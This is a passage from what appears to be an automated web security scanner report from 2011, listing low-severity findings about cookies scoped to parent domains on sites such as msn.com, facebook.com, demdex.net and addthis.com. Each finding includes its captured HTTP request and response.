18434184691845t184531844w1844e184881846v1844v4fhux122s000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru00000000000000000000000004esx7120104tej

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=015020a0e0f0g1lebnnsxzt11o9ctxzt11o9ctxzt11kzqpxzt11o9ct; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv1o9ct00u0x010602201; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
Set-Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
Set-Cookie: orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
Set-Cookie: rdrlst=40x07dpletz4d0000000q0x010o2ylebnns0000000u0x010mmnlebnns0000000u0x010xo1lebnns0000000u0x010x1blebnns0000000u0x010eh5lf17qf0000000m0x0106bylemlne0000000s0x010w3clebnns0000000u0x0107gmlebnns0000000u0x010jv6lebnns0000000u0x010j4ilew2e20000000o0x010xthlebnns0000000u0x010fullf8gij0000000i0x011196lfzx0l000000010x0100c9lfk1rn0000000f0x010jillebnns0000000u0x010fuqlegh2b0000000t0x010b6mlf17qk0000000l0x010mz1lebnns0000000u0x010cajlfk1rn0000000f0x010p7vlebnns0000000u0x0107vglfk1rn0000000f0x010xvslebnns0000000u0x010xuklebnns0000000u0x010x1jlebnns0000000u0x010jk7lebnns0000000u0x010cbnlfk1rn0000000f0x010yiplebnns0000000u0x010yh0lebnns0000000u0x010xwflebnns0000000u0x010e4vlebnns0000000u0x010jwblfk1rn0000000f0x010xwblebnns0000000u0x01; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo0000000k0x010602201ag2leqh1919fzc00r0x01060220182gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns1o9ct00u0x0106022015q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0g7m300g0x010602201820lebnns181qq00e0l000400100b0olfjpei0g7m300g0x010602201ab4lebnns1o9ct00u0x0106022019szlebnns1o9ct00u0x0106022018wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1jfya00t0x010602201al1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns1o9ct00f0x0106012017y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei0g7m300g0x010602201b08lfjpei0g7m300g0x01060220140slebnns181qq00e0l00040010045mlfdxmc0000000h0x010602201a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
Set-Cookie: vstcnt=3lebnns031l034e206123s181qq1845a1847x1845b1847u1847e1847k1847y1843w1844k184621845j1844p184551843s1847h1846q1844z184871846u184571843u18486184741846t1846l1845r1842z185k81848f1844n1844d184781846a1845v1846j1846k184801845s1843g1847a1843d184841846r1845y1844l1847i1847r1847p184541843r1845i1844y1844r1842x184811846o1844u1844s1847b1843k1843n1848a1845q1845n1845c1842t1844j1845e1845g184821846p184301847f1844c1847t1843c1843j1848b1847z1842u1843p184851846s1845f1845h18435184371846b1843o1845m1847s1848g1844g184561843t1847c1847g1843f1844a1847v1843m1844m184721845p1848e1844q1848c1843h1842y1847d1848d1844t1845x1847q1845k184711845o1846i1844f184791845w1845d184581844h1843v1847o18434184691845t184531844w1844e184881846v1844v4fhux122s000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru00000000000000000000000004esx7120104tej0r023ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z4nssk122m1boph1c4wn1bw2l1bw321bw2o1bw501bw3n1bw4o1bw3c1bw301bw5f1bw4e1bw381bw3l1bw2m1bw2c1bw351bw481bw2v1bw4h1bw4x1bw4b1bw361bw3z1bw4f1bw4w1bw4g1bw331bw431bw2q1bw4z1bw2b1bw441bw2r1bw5e1bw3f1bw521bw3p1bw5a1bw311bw4r1bw5d1bw5j1bw421bw2p1bw3x1bw5g1bw2i1bw4a1bw3b1bw531bw4p1bw3q1bw541bw3r1bw4q1bw4j1bw461bw2t1bw3m1bw4y1bw4s1bw2z1bw4c1bw2k1bw3v1bw4i1bw4t1bw3a1bw451bw2s1bw2j1bw4n1bw3e1bw591bw3w1bw401bw2n1bw3u1bw341bw4u1bw3k1bw491bw2w1bw5b1bw561bw3t1bw511bw551bw3s1bw471bw2u1bw5i1bw4l1o018EstvP2qn11011o9ct; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
Location: http://r.openx.net/set?pid=1c6323e9-0811-5464-3af4-c00f47248395&rtb=6ch47d7o8wtv
Content-Length: 0
Date: Wed, 02 Feb 2011 15:14:45 GMT

11.52. http://deals.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://deals.msn.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=3f8fd347c99547099a4814fa8b9e7293; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1D770C0684124A3E8436F4C065609D19; domain=.msn.com; expires=Sat, 20-Aug-2011 15:31:32 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: deals.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:31:32 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3f8fd347c99547099a4814fa8b9e7293; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1D770C0684124A3E8436F4C065609D19; domain=.msn.com; expires=Sat, 20-Aug-2011 15:31:32 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

11.53. http://developer.yahoo.com/yui/compressor/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developer.yahoo.com
Path:	/yui/compressor/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

B=d39814h6kj0v3&b=3&s=tc; expires=Tue, 02-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yui/compressor/ HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.54. http://developers.facebook.com/plugins/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/plugins/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=5INJTTrko7Q6nSrVnX5GKofQ; expires=Fri, 01-Feb-2013 16:18:44 GMT; path=/; domain=.facebook.com; httponly
lsd=WT1SJ; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://developers.facebook.com/docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: datr=5INJTTrko7Q6nSrVnX5GKofQ; expires=Fri, 01-Feb-2013 16:18:44 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=WT1SJ; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 16:18:44 GMT
Content-Length: 0

11.55. http://dm.demdex.net/pixel/10236 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.demdex.net
Path:	/pixel/10236

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

demdex=dv2:eLHun3HgfhcbrRmH3JUk3A==; path=/; expires=Sat, 30-Jan-21 15:11:20 GMT; domain=.demdex.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/10236?data:|pdata:|logdata:st= HTTP/1.1
Host: dm.demdex.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: demdex=dv2:eLHun3HgfhcbrRmH3JUk3A==

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:11:20 GMT
Server: Apache/2.2.10 (Unix)
Set-Cookie: DexLifeCycle=NEW01296659480101778|MTA4MDQ9MTo3NjI=|MA==|MA==|NjU4OTE0ODA=|MA==|MTA4MDQtMA==; path=/; expires=Sat, 30-Jan-21 15:11:20 GMT; domain=.dm.demdex.net
Set-Cookie: demdex=dv2:eLHun3HgfhcbrRmH3JUk3A==; path=/; expires=Sat, 30-Jan-21 15:11:20 GMT; domain=.demdex.net
Set-Cookie: dm=dv2:eLHun3HgfhcbrRmH3JUk3A==; path=/; expires=Sat, 30-Jan-21 15:11:20 GMT; domain=.dm.demdex.net
Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
Last-Modified: Tue, 12 Oct 2010 21:33:06 GMT
ETag: "9dad3-134-4927238efa880"
Accept-Ranges: bytes
Content-Length: 308
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
Content-Type: image/jpeg

......JFIF..............Exif..II*..............C....................................................................C............................................................................"......
...[SNIP]...

11.56. http://dpm.demdex.net/demdot.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dpm.demdex.net
Path:	/demdot.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

demdex=dv2:eLHun3HgfhcbrRmH3JUk3A==; path=/; expires=Sat, 30-Jan-21 15:11:28 GMT; domain=.demdex.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /demdot.jpg?et:dpm|dpid:22|data:&location=texas&industry=business_services HTTP/1.1
Host: dpm.demdex.net
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: demdex=dv2:eLHun3HgfhcbrRmH3JUk3A==; bizo=1

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:11:28 GMT
Server: Apache/2.2.10 (Unix)
Set-Cookie: DexLifeCycle=NEW01296659488235797|MA==|MA==|MA==|NjU4OTE0ODg=|MA==|MA==; path=/; expires=Sat, 30-Jan-21 15:11:28 GMT; domain=.dpm.demdex.net
Set-Cookie: demdex=dv2:eLHun3HgfhcbrRmH3JUk3A==; path=/; expires=Sat, 30-Jan-21 15:11:28 GMT; domain=.demdex.net
Set-Cookie: dpm=dv2:eLHun3HgfhcbrRmH3JUk3A==; path=/; expires=Sat, 30-Jan-21 15:11:28 GMT; domain=.dpm.demdex.net
Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
Last-Modified: Tue, 12 Oct 2010 21:33:06 GMT
ETag: "7adeb-134-4927238efa880"
Accept-Ranges: bytes
Content-Length: 308
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
Content-Type: image/jpeg

......JFIF..............Exif..II*..............C....................................................................C............................................................................"......
...[SNIP]...

11.57. http://ds.addthis.com/red/psi/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/p.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Mon, 02 May 2011 15:32:27 GMT; Path=/
di=%7B%7D..1296574347.19F|1296574347.19A; Domain=.addthis.com; Expires=Thu, 31-Jan-2013 10:47:39 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /red/psi/p.json HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 267
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 01 Feb 2011 15:32:27 GMT; Path=/
Set-Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Mon, 02 May 2011 15:32:27 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 03 Mar 2011 15:32:27 GMT; Path=/
Set-Cookie: di=%7B%7D..1296574347.19F|1296574347.19A; Domain=.addthis.com; Expires=Thu, 31-Jan-2013 10:47:39 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 01 Feb 2011 15:32:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 01 Feb 2011 15:32:27 GMT
Connection: close

_ate.hrr({"urls":["http://segment-pixel.invitemedia.com/pixel?pixelID=38582&partnerID=169&key=segment","http://segment-pixel.invitemedia.com/pixel?pixelID=15694&partnerID=169&key=segment"],"segments"
...[SNIP]...

11.58. http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.ehow.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296659685.60|1296659685.66; Domain=.addthis.com; Expires=Fri, 01-Feb-2013 00:28:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.ehow.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ehow.com%2Fcomputer-software%2F&ref=http%3A%2F%2Fburp%2Fshow%2F4&o1jt6o HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296507257.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 346
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 02 Feb 2011 15:14:45 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 04 Mar 2011 15:14:45 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296659685.60|1296659685.66; Domain=.addthis.com; Expires=Fri, 01-Feb-2013 00:28:04 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 02 Feb 2011 15:14:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 15:14:45 GMT
Connection: close

_ate.ad.hpr({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.ehow.com%2fcomputer-software%2f","http://xcdn.xgraph.net
...[SNIP]...

11.59. http://edge.quantserve.com/quant.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://edge.quantserve.com
Path:	/quant.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mc=4d481969-16684-f7cfe-c8df4; expires=Tue, 01-Feb-2021 14:32:09 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quant.js HTTP/1.1
Host: edge.quantserve.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
ETag: "18278:E0-227342138-1296570729091"
Vary: Accept-Encoding
Last-Modified: Tue, 01-Feb-2011 14:32:09 GMT
Content-Type: application/x-javascript
Set-Cookie: mc=4d481969-16684-f7cfe-c8df4; expires=Tue, 01-Feb-2021 14:32:09 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 02 Feb 2011 14:32:09 GMT
Content-Length: 5265
Date: Tue, 01 Feb 2011 14:32:09 GMT
Server: QS

if(!__qc){var __qc={qcdst:function(){if(__qc.qctzoff(0)!=__qc.qctzoff(6))return 1;return 0;},qctzoff:function(m){var d1=new Date(2000,m,1,0,0,0,0);var t=d1.toGMTString();var d3=new Date(t.substring(0,
...[SNIP]...

11.60. http://editorial.autos.msn.com/articles/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/articles/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=b9bfa5195ac242b6b3c0e65032e98705; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=4121B0CBC49B4A6EBD8938C8585174FE; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /articles/default.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:32:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b9bfa5195ac242b6b3c0e65032e98705; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4121B0CBC49B4A6EBD8938C8585174FE; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 38991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.61. http://editorial.autos.msn.com/blogs/autosblog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/blogs/autosblog.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=359d35043ed54139853a37a4e289217d; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=E8F56045ECCA4D669B1521C01014A312; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blogs/autosblog.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:32:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=359d35043ed54139853a37a4e289217d; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E8F56045ECCA4D669B1521C01014A312; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 53586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.62. http://editorial.autos.msn.com/media/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/media/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=4f2f19d5d3e64638a39ef8c9a0e56298; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=9A2C4E32A10C4DF3AE112D8B596AEC73; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/default.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:32:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=4f2f19d5d3e64638a39ef8c9a0e56298; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=9A2C4E32A10C4DF3AE112D8B596AEC73; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.63. http://editorial.autos.msn.com/media/video/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/media/video/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=0dd7202db890418c95a7232d432d9a03; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1CF9F665B11C4AE9AF3A7B83F378BDD3; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/video/default.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:32:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=0dd7202db890418c95a7232d432d9a03; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1CF9F665B11C4AE9AF3A7B83F378BDD3; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 18460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...

11.64. http://editorial.autos.msn.com/new-cars/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/new-cars/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=775a706ba27249818384c9ddc6f0be26; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=452825B919744E0CBD3D811A7E5DDB62; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/

